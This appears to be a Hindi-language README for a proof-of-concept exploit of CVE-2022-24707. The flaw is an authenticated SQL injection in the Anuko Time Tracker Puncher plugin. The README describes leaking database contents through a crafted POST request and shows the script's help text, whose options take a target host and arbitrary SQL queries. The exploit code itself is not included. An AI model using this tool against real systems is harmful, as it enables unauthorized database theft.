
CVE-2022-24707 का PoC
Puncher प्लगइन में SQL इंजेक्शन भेद्यता। SQL इंजेक्शन का शोषण करने और डेटाबेस सामग्री को लीक करने के लिए एक POST अनुरोध तैयार किया जा सकता है। यह Anuko Time Tracker 1.20.0.5640 पर परीक्षण किया गया है।
python3 exploit.py --help
usage: exploit.py [-h] --username USERNAME --password PASSWORD --host HOST [--sqli SQLI]
optional arguments:
-h, --help show this help message and exit
--username USERNAME Anuko Timetracker username
--password PASSWORD Anuko Timetracker password
--host HOST e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000
--sqli SQLI SQL query to run. Defaults to getting all tables
